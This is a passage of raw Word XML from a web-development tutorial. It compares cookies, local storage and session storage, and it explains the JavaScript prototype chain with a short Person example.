    <w:p w14:paraId="11BB4009" w14:textId="77777777" w:rsidR="00D71D14" w:rsidRPr="00DA2F32" w:rsidRDefault="00D71D14" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="634"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Its data is never transferred to the server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57945CB4"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Cons</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B55182" w14:textId="77777777" w:rsidR="00D71D14" w:rsidRPr="00DA2F32" w:rsidRDefault="00D71D14" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="635"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Its data is plain text; hence it is not secure by design</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5404EC8D" w14:textId="77777777" w:rsidR="00D71D14" w:rsidRPr="00DA2F32" w:rsidRDefault="00D71D14" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="635"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>The data type is limited to string; hence it needs to be serialized</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF3AEAB" w14:textId="77777777" w:rsidR="00D71D14" w:rsidRPr="00DA2F32" w:rsidRDefault="00D71D14" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="635"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Data can only be read on the client-side, not on the server-side</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E80C0F8"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Session Storage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C77C4AF"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It is very similar to the local storage. Still, the main difference lies in the lifespan as it persists in the browser until its current tab is on. Once you close the tab or terminate it, the data on session storage also gets lost. We can also set and retrieve its data using setItem() and getItem() methods, respectively, similar to the local storage methods. For example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C13834"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session setItem(key, value);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4495F96F"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session Storage .getItem(key);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488EE94C"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CSI stands for Container Storage Interface. It is an initiative to combine the storage interface of Container Orchestrator Systems such as Mesos, Kubernetes, Docker Swarm, etc. Click to explore about, </w:t>
      </w:r>
      <w:hyperlink r:id="rId24" w:history="1">
        <w:r w:rsidRPr="00DA2F32">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>Container Storage Interface for Kubernetes</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2D98D783"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What exactly is a cookie?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B907A54"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The only option that was available before HTML 5 was introduced was cookies. So, storing data with it is a legacy approach to storing data on the client machine. It help us store the client-side data to enable a personalized experience for the website’s users. These are sent with requests to the server and are sent to the client on response; hence its data is exchanged with the server on every request. The servers could use the cookie data to send personalized content to users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B1DC21"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lastRenderedPageBreak/>
        <w:t>Like web storage, it can also be created, updated, or read through JavaScript: document. Cookie. There is an HTTP Only cookie flag available to us which can be used to restrict the cookie access in JavaScript to mitigate a few security issues such as cross-site scripting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5256C23E"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Cookies are categorized into two types: session cookies and persistent cookies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65669FB6"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Session </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D09E521"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It do not specify the attributes such as Expires or Max-Age and hence are removed when the browser is closed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA7FEEC"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Persistent </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AEB9F12"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Persistent cookies specify the Expires or Max-Age attributes. These do not expire on closing the browser but will expire at a specific date (Expires) or length of time (Max-Age).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C42286A"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Which should we use: Comparison and use cases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71155128"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There are many use cases of browser storage methods. The most common use cases of browser storage are:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D765E3" w14:textId="77777777" w:rsidR="00D71D14" w:rsidRPr="00DA2F32" w:rsidRDefault="00D71D14" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="636"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Personalizing site preferences</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376CA722" w14:textId="77777777" w:rsidR="00D71D14" w:rsidRPr="00DA2F32" w:rsidRDefault="00D71D14" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="636"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Persisting site activities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E548BE1" w14:textId="77777777" w:rsidR="00D71D14" w:rsidRPr="00DA2F32" w:rsidRDefault="00D71D14" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="636"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Storing the login state</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C873058" w14:textId="77777777" w:rsidR="00D71D14" w:rsidRPr="00DA2F32" w:rsidRDefault="00D71D14" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="636"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Saving data locally so that the website will be quicker to download or use without a network connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1956989B" w14:textId="77777777" w:rsidR="00D71D14" w:rsidRPr="00DA2F32" w:rsidRDefault="00D71D14" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="636"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Improving website performance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2936DF" w14:textId="77777777" w:rsidR="00D71D14" w:rsidRPr="00DA2F32" w:rsidRDefault="00D71D14" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="636"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Reducing back-end server requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2AC435"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The browser storage methods could be differentiated based on three main parameters - storage limit, accessibility, and expiration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B5EBC3"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Storage Limit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F226EC2"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Each browser storage method has a specific maximum data size. Both storage provide a large memory capacity. To be more specific, local Storage stores up to 10 megabytes and session storage stores up to 5 megabytes. On the other hand, these provide a very restrictive and small storage capacity of 4 kilobytes. So we cannot store large amounts of information in cookies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76FFD6EC"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Accessibility</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE522C1"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From the accessibility perspective, it could be accessed in any window or tab open on the browser for a website. But if we talk about it, since session storage is tied to the particular session and each tab has its session, data is only available in the current tab in which we’ve set the session storage data. Lastly, cookies are somewhat similar to local storage as they are accessible from any window or tab. It could also be accessed on the server. Whenever we request the back-end server, all the cookies are also sent along. So they are also used for tasks related to authentication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24732C3E" w14:textId="77777777" w:rsidR="00D71D14" w:rsidRPr="00DA2F32" w:rsidRDefault="00D71D14" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Expiration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7175101A"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Its data never expires until you manually remove it, so in that sense, it could be very useful. Its data expires as soon as we close the tab because data is only available to a particular session and is equivalent to a tab. These are unique as we can manually set the expiration date for them.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="8212"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2258"/>
        <w:gridCol w:w="1843"/>
        <w:gridCol w:w="1985"/>
        <w:gridCol w:w="2126"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D71D14" w:rsidRPr="00DA2F32" w14:paraId="2B62D09C" w14:textId="77777777" w:rsidTr="007D2945">
        <w:trPr>
          <w:trHeight w:val="405"/>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2F79D86"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062DCB1"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b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Cookies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BB96949"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b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Local storage</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3090072"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b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Session storage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D71D14" w:rsidRPr="00DA2F32" w14:paraId="23744B99" w14:textId="77777777" w:rsidTr="007D2945">
        <w:trPr>
          <w:trHeight w:val="359"/>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8E9B72F"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Capacity</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92536A2"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4KB</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3AD8CEF"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10MB</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404B3D8"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5MB</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D71D14" w:rsidRPr="00DA2F32" w14:paraId="06AD71CD" w14:textId="77777777" w:rsidTr="007D2945">
        <w:trPr>
          <w:trHeight w:val="138"/>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F84F629"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Browsers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AE46AF8"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HTML 4 / HTML 5</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E89165"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HTML 5</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01EBFB6"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HTML 5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D71D14" w:rsidRPr="00DA2F32" w14:paraId="6C364465" w14:textId="77777777" w:rsidTr="007D2945">
        <w:trPr>
          <w:trHeight w:val="322"/>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6F3804B"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Accessible From</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8D8747"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Any window</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E8B73F3"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Any window</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6EC2438"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Same tab</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D71D14" w:rsidRPr="00DA2F32" w14:paraId="2651822E" w14:textId="77777777" w:rsidTr="007D2945">
        <w:trPr>
          <w:trHeight w:val="324"/>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8EABE8A"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Expiration</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09CAB0B"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Manually set</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55AA906"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Never</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21337D4"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On tab close</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D71D14" w:rsidRPr="00DA2F32" w14:paraId="1383A252" w14:textId="77777777" w:rsidTr="007D2945">
        <w:trPr>
          <w:trHeight w:val="284"/>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FFBE11A"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Browser support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CF75360"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Very high</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4654CD"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Very high</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0302EE3"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Very high</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D71D14" w:rsidRPr="00DA2F32" w14:paraId="0CCC68B9" w14:textId="77777777" w:rsidTr="007D2945">
        <w:trPr>
          <w:trHeight w:val="365"/>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BF6CDD3"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Supported data types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42EDAD"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String only</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0A4A70A"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String only</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A91661"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String only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D71D14" w:rsidRPr="00DA2F32" w14:paraId="36332CFA" w14:textId="77777777" w:rsidTr="007D2945">
        <w:trPr>
          <w:trHeight w:val="22"/>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8DA40C0"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Auto-expire option</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7F2BA6E"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Yes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5E6B5AD"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No</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ED46BA9"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Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D71D14" w:rsidRPr="00DA2F32" w14:paraId="2AF28EAB" w14:textId="77777777" w:rsidTr="007D2945">
        <w:trPr>
          <w:trHeight w:val="402"/>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45152F4"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Storage Location</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EE83635"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Browser and server</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D744161"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Browser only</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FFD13EE"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Browser only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D71D14" w:rsidRPr="00DA2F32" w14:paraId="25180A80" w14:textId="77777777" w:rsidTr="007D2945">
        <w:trPr>
          <w:trHeight w:val="21"/>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657FDAE"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Sent with requests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8ABC198"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Yes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02EC5B4"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No</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D6349EE"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No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D71D14" w:rsidRPr="00DA2F32" w14:paraId="412B4BCB" w14:textId="77777777" w:rsidTr="007D2945">
        <w:trPr>
          <w:trHeight w:val="402"/>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6579E94"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Editable and Blockable by users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A6B5196"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Yes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2259559"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Yes</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DF5778" w14:textId="77777777" w:rsidR="00D71D14" w:rsidRPr="00DA2F32" w:rsidRDefault="00D71D14" w:rsidP="009E0607">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="593D2206" w14:textId="77777777" w:rsidR="00D71D14" w:rsidRPr="00DA2F32" w:rsidRDefault="00D71D14" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6495046D" w14:textId="701B0FE1" w:rsidR="00D246F0" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="64" w:name="_Toc178383247"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>What is a prototype chain</w:t>
      </w:r>
      <w:bookmarkEnd w:id="64"/>
    </w:p>
    <w:p w14:paraId="5200F530" w14:textId="77777777" w:rsidR="009C098D" w:rsidRPr="00DA2F32" w:rsidRDefault="009C098D" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Understanding the Prototype Chain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09CB083C" w14:textId="77777777" w:rsidR="009C098D" w:rsidRPr="00DA2F32" w:rsidRDefault="009C098D" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="215"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Prototype Object</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D079873"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Every JavaScript object has an internal property called [[Prototype]] (often accessed via __proto__), which points to another object. This other object is called the prototype.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37704586"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If an object does not have a property or method, JavaScript looks up the prototype chain to see if the property or method exists on the prototype object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69280609" w14:textId="77777777" w:rsidR="009C098D" w:rsidRPr="00DA2F32" w:rsidRDefault="009C098D" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="215"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Prototype Chain</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7C77BD"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The prototype chain is the series of links between an object and its prototypes. When you try to access a property on an object, JavaScript first checks the object itself. If the property isn’t found, it follows the [[Prototype]] link to the object's prototype and continues this search up the chain until the property is found or the end of the chain is reached.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250A59CA"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lastRenderedPageBreak/>
        <w:t>The end of the prototype chain is null. This is because Object.prototype.__proto__ is null, signifying no further prototype.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192362D7" w14:textId="77777777" w:rsidR="009C098D" w:rsidRPr="00DA2F32" w:rsidRDefault="009C098D" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21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007D59C0"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Person(name) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E8D27F"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this.name = name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E0315E"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4D2E9A5" w14:textId="77777777" w:rsidR="009C098D" w:rsidRPr="00DA2F32" w:rsidRDefault="009C098D" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A5A3A95"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Person.prototype.sayHello = function() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12861F3A"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console.log(`Hello, my name is ${this.name}`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E68B748"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24C1C5F" w14:textId="77777777" w:rsidR="009C098D" w:rsidRPr="00DA2F32" w:rsidRDefault="009C098D" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CE952D6"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person = new Person('Alice');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1BABEB" w14:textId="77777777" w:rsidR="009C098D" w:rsidRPr="00DA2F32" w:rsidRDefault="009C098D" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="769F177B"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Accessing properties and methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5054C3F7"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person.sayHello(); // "Hello, my name is Alice"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EEEC55A" w14:textId="77777777" w:rsidR="009C098D" w:rsidRPr="00DA2F32" w:rsidRDefault="009C098D" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0915F9BF"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console.log(person.hasOwnProperty('name')); // true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1AC504" w14:textId="77777777" w:rsidR="009C098D" w:rsidRPr="00DA2F32" w:rsidRDefault="009C098D"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console.log(person.hasOwnProperty('sayHello')); // false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D04FFDF" w14:textId="77777777" w:rsidR="009C098D" w:rsidRPr="00DA2F32" w:rsidRDefault="009C098D"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console.log(person.__proto__.hasOwnProperty('sayHello')); // true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D8EA8D" w14:textId="77777777" w:rsidR="009C098D" w:rsidRPr="00DA2F32" w:rsidRDefault="009C098D" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>In this example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33AAE336"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person is an instance of Person.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DDB6D1A"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person has a name property directly on it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F55A29"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sayHello is defined on Person.prototype, so it’s available on person via the prototype chain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509096F5"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If you attempt to access person.sayHello(), JavaScript will find sayHello in the Person.prototype.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55FC1A75" w14:textId="77777777" w:rsidR="009C098D" w:rsidRPr="00DA2F32" w:rsidRDefault="009C098D" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="215"/>
        </w:numPr>
